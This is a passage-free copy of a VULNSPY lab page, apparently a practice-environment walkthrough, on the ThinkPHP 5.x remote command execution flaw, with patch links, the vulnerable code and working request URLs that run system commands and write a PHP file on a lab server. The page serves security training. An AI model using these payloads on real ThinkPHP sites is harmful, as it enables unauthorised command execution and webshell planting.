<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" lang="zh-CN">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="author" content="Ambulong">
<meta name="description" content="ThinkPHP官方2018年12月9日发布重要的安全更新，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，受影响的版本包括5.0和5.1版本，推荐尽快更新到最新版本。">
<meta name="keywords" content="thinkphp,tp 5.x,5.1,5.0,rce,vulnerability,imageMagick,imagick,ghostscript,任意文件上传,代码执行,9.22.1,rce,在线环境,靶场,演示,exp,exploit,security,practict,在线靶场,黑客技术,网络安全,信息安全,漏洞测试,CTF在线,渗透测试,在线练习,演练,实验,pentest,online">
<title>ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用（GetShell） | VULNSPY</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
<script src="/js/jquery-1.11.3.min.js"></script>
<script src="/js/jquery-migrate-1.2.1.min.js"></script>
<link href="/css/bootstrap.min.css" rel="stylesheet">
<link href="/css/ie10-viewport-bug-workaround.css" rel="stylesheet">
<!--[if lt IE 9]><script src="/js/ie8-responsive-file-warning.js"></script><![endif]-->
<script src="/js/ie-emulation-modes-warning.js"></script>
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
<script src="/js/bootstrap.min.js"></script>
<!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
<script src="/js/ie10-viewport-bug-workaround.js"></script>
<link rel="stylesheet" href="/css/custom.css" />
<link rel="stylesheet" href="/css/prism.css" />
<script src="/js/functions.js"></script>
<script src="/js/custom.js"></script>
<script>
function GetQueryString(name)
{
     var reg = new RegExp("(^|&)"+ name +"=([^&]*)(&|$)");
     var r = window.location.search.substr(1).match(reg);
     if(r!=null)return  unescape(r[2]); return null;
}
var lang="en";
var la=(navigator.language) ? navigator.language.toLowerCase() : navigator.userLanguage.toLowerCase();
if(la=='zh-cn' || la=='zh-tw' || la=='zh-hk'){
	lang="cn";
}
</script>
<!--[if lt IE 9]>
	<script src="http://css3-mediaqueries-js.googlecode.com/svn/trunk/css3-mediaqueries.js"></script>
<![endif]-->
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-108901411-2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-108901411-2');
</script>
</head>
<body>
<div class="view-header" style="z-index: 999;">
    <ul>
    	<li><a href="/"><h1><img style="width:1.5em;height: auto;margin-top: -0.3em;" src="/images/owl2.png" /></h1></a></li>
        <li ><a href="/">VULNSPY</a></li>
        <li><a href="https://blog.vulnspy.com/">BlOG</a></li>
        <div class="pull-right">
            <li><a target="_blank" href="/images/qqun.jpeg">QQ 群</a></li>
            <li><a target="_blank" href="https://t.me/vulnspy">TELEGRAM GROUP</a></li>
            <li><a target="_blank" href="https://www.youtube.com/channel/UCnqjUDkrZ0OFwZvxxiC47gw">YOUTUBE CHANNEL</a></li>
        </div>
    </ul>
</div>
<style>
.main{
	
	margin: 0 auto;
	margin-top: 7em;
	max-width: 90em;
	width: 95%;
}
.lab{
	float:left;
	width: 77%;
}
.lab h1{
	padding: 0;
	font-size: 230%;
	margin: 20px 0;
	line-height: 1.5em;
}

.lab .demo{
	font-size: 115%;
	line-height: 2em;
	border: 1px solid #ccc;
	background: #2C3844;
	margin: 1.8em 0 1em 0;
}
.lab .demo .demo-btn{
	text-align: center;
	font-size: 150%;
	margin: 0.3em 0;
	color: #FFF;
}
.lab .demo .demo-btn a{
	background: transparent;
	padding: 1em;
	font-size: 100%;
	display: block;
	
}
.lab .demo .demo-link{
	background: rgba(0,0,0,.25);
}
.lab .demo a{
	font-size: 50%;
	text-transform: uppercase;
	padding: 0 0.5em;
	color: #FFF;
}
.lab .content{
	font-size: 130%;
	line-height: 1.5em;
}
.lab .content p{
	margin: 1em 0;
	word-wrap: break-word;
}
.lab .content img{
	max-width: 100%;
	margin: 1em 0;
}
.sidebar{
	width: 23%;
	float: left;
	padding-left: 2em;
	margin-top: 20px;
}
.sidebar .sth-btn {
	width: 100%;
	margin-left: 1em;
}
#sth {
	display: block;
	text-align: center;
	text-transform: uppercase;
	padding: 0.8em 1em;
	font-size:123%;
	border: none;
	border-radius: 0;
	background: #337ab7;
	color: #FFF;
	font-weight: bold;
}
#demo-notice {
	width: 100%;
	margin: 0.8em 0;
	font-size: 90%;
	text-align: center;
	color: #777;
	word-break:break-all;
}
.sidebar ul{
	margin: 2em 0;
	padding: 0;
}
.sidebar ul ul{
	margin: 0;
	margin-left: 1em;
}
.sidebar li{
	margin: 0 0 0.5em 0;
	font-size: 110%;
	list-style: none;
	color: #767676;
	border-left: solid 0.1em #FFF;
	padding-left: 1em;
	margin-left: 1em;
	cursor: pointer;
}
.sidebar li.selected{
	color: #2C3844;
	border-left: solid 0.1em #2C3844;
}
.sidebar li:hover{
	color: #2C3844;
	border-left: solid 0.1em #2C3844;
}
</style>
<div class="main">
	<div class="lab">
		<h1>ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用（GetShell）</h1>
		<hr/>
		<div class="content"><blockquote>
<p>ThinkPHP官方2018年12月9日发布重要的<a href="https://blog.thinkphp.cn/869075">安全更新</a>，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，受影响的版本包括5.0和5.1版本，推荐尽快更新到最新版本。</p>
</blockquote>
<p><img src="/images/thinkphp-5.1.29/default.png" alt="" /></p>
<h3>漏洞分析</h3>
<p>Thinkphp v5.0.x补丁地址: <a href="https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f">https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f</a></p>
<p>Thinkphp v5.1.x补丁地址: <a href="https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815">https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815</a></p>
<p>关键代码：</p>
<pre><code class="language-php">// 获取控制器名
$controller       = strip_tags($result[1] ?: $this-&gt;rule-&gt;getConfig('default_controller'));</code></pre>
<p>在修复之前程序未对控制器进行过滤，导致攻击者可以通过引入<code>\</code>符号来调用任意类方法。</p>
<h3>漏洞利用</h3>
<p>漏洞环境源码：<a href="https://github.com/vulnspy/thinkphp-5.1.29">https://github.com/vulnspy/thinkphp-5.1.29</a></p>
<p><strong>1. 点击右上角的 <code>START TO HACK</code> 按钮创建实验环境</strong></p>
<p><img src="/images/thinkphp-5.1.29/1.1.png" alt="" /></p>
<p><strong>2. 进入实验环境</strong></p>
<p><img src="/images/thinkphp-5.1.29/2.1.png" alt="" /></p>
<p><strong>3. 执行系统命令显示目录下文件</strong></p>
<pre><code class="language-bash">http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=ls%20-l</code></pre>
<p><img src="/images/thinkphp-5.1.29/3.1.png" alt="" /></p>
<p><strong>4. 执行phpinfo</strong></p>
<pre><code class="language-bash">http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=php%20-r%20'phpinfo();'</code></pre>
<p><img src="/images/thinkphp-5.1.29/4.1.png" alt="" /></p>
<p><strong>5. 写info.php文件</strong></p>
<p>方法 1：</p>
<pre><code class="language-bash">http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=echo%20%27&lt;?php%20phpinfo();?&gt;%27%20&gt;%20info.php</code></pre>
<p>方法 2：</p>
<pre><code class="language-bash">http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=file_put_contents&amp;vars[1][]=info.php&amp;vars[1][]=%3C?php%20phpinfo();?%3E</code></pre>
<p>访问 info.php</p>
<p><img src="/images/thinkphp-5.1.29/5.1.png" alt="" /></p>
<h3>参考</h3>
<ul>
<li><a href="https://blog.thinkphp.cn/869075">ThinkPHP5.*版本发布安全更新</a></li>
</ul></div>
	</div>
	<div class="sidebar">
		<div class="sth-btn">
			<a id="sth" target="_blank" href="https://www.vsplate.com/?github=vulnspy/thinkphp-5.1.29&amp;autogo=1">start to hack</a>
			<p id="demo-notice">Click the button and start the playing.</p>
		</div>
		<ul>
			<li href="#" class="nlink selected"># TOP</li>
		</ul>
	</div>
</div>
<script>
if(lang == 'cn'){
	$("#demo-notice").html("点击上方按钮开启实验.");
}
$(document).ready(function(){

$.extend({
	genMenu: function() {
		var html = '';
		var prevH = 'h0';
		var toClose = 0;
		$(".content").children("h1,h2,h3,h4,h5").each(function(i,e){
			var tagName = $(e)[0].tagName.toLowerCase();
			//var menuName = 'M-'+window.btoa($(e).text());
			var menuName = 'M-'+randomString(32);//+'-'+$(e).text().replace(/\ +/g,"-");
			$(e).attr('id',menuName);
			if(tagName > prevH){
				html = html+'<ul>';
				html = html+'<li class="menu-item nlink" href="#'+$.escapeHtml(menuName)+'">'+$.escapeHtml($(e).text())+'</li>';
				toClose = toClose + 1;
			}else if(tagName == prevH){
				html = html+'<li class="menu-item nlink" href="#'+$.escapeHtml(menuName)+'">'+$.escapeHtml($(e).text())+'</li>';
			}else if(tagName < prevH){
				html = html+'</ul>';
				html = html+'<li class="menu-item nlink" href="#'+$.escapeHtml(menuName)+'">'+$.escapeHtml($(e).text())+'</li>';
				toClose = toClose - 1;
			}
			prevH = tagName;
		});
		while(toClose > 0){
			html = html+'</ul>';
			toClose = toClose - 1;
		}
		$(".sidebar ul").remove();
		$(".sidebar").append(html);
		$(".sidebar ul:first").prepend('<li class="menu-item nlink selected" href="#"># TOP</li>');
		return html;
	}
});
$.extend({
	selectMenu: function() {
		var mintoTop = 20;
		var menu = [];
		$("li.menu-item").each(function(i,e){
			id = $(e);
			if(id && id != '#'){
				menu.push(id);
			}
		});
		for(var i=menu.length;i>0;i--){
			mid = menu[i-1].attr('href');
			var toTop = $(mid).offset().top-$(document).scrollTop();
			if(toTop <= mintoTop){
				$("li.menu-item").removeClass('selected');
				menu[i-1].addClass('selected');
				break;
			}
		}
		return mid;
	}
});
$.extend({
	fixSidebar: function() {
		var sidebarTop = $(".sidebar").offset().top-$(document).scrollTop();
		if($(document).scrollTop() < 120){
			$(".sidebar").css("margin-top", "20px");
		}else if(sidebarTop < 20){
			$(".sidebar").css("margin-top", ($(document).scrollTop()-80)+"px");
		}else if(sidebarTop > 20 && $(document).scrollTop() > 120){
			$(".sidebar").css("margin-top", ($(document).scrollTop()-80)+"px");
		}
	}
});
$.genMenu();
$(window).scroll(function(){
	$.fixSidebar();
	$.selectMenu();
});

});
</script>
<div style="float:left;width:100%;text-align:center;margin-top:5em;background: #000;color: #FFF;">
	<div style="margin:0 auto;width:95%;max-width:90em;padding:1em 0;">All rights reserved. &copy; 2018 VULNSPY</div>
</div>
<script>
$(function () {
	$("pre code").closest("pre").addClass("line-numbers ");
});
</script>
<script src="/js/prism.js"></script>
</body>
</html>
